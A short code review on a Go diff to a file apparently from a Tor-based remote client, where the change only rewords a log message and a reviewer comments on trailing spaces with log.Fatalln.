torat_client/netclient.go

```diff
@@ -51,14 +51,14 @@ func NetClient() {
 
 	t, err := tor.Start(nil, &conf)
 	if err != nil {
-		log.Println("[!] Tor could not be started:", err)
+		log.Println("[NetClient] [!] Tor could not be started: ", err)
 		return
 	}
 
 	api := new(API)
 	rpcErr := rpc.Register(api)
 	if rpcErr != nil {
-		log.Fatal(rpcErr)
```

Comment:
If you use log.Fatalln you don't need the trailing space.

Reply:
Fixed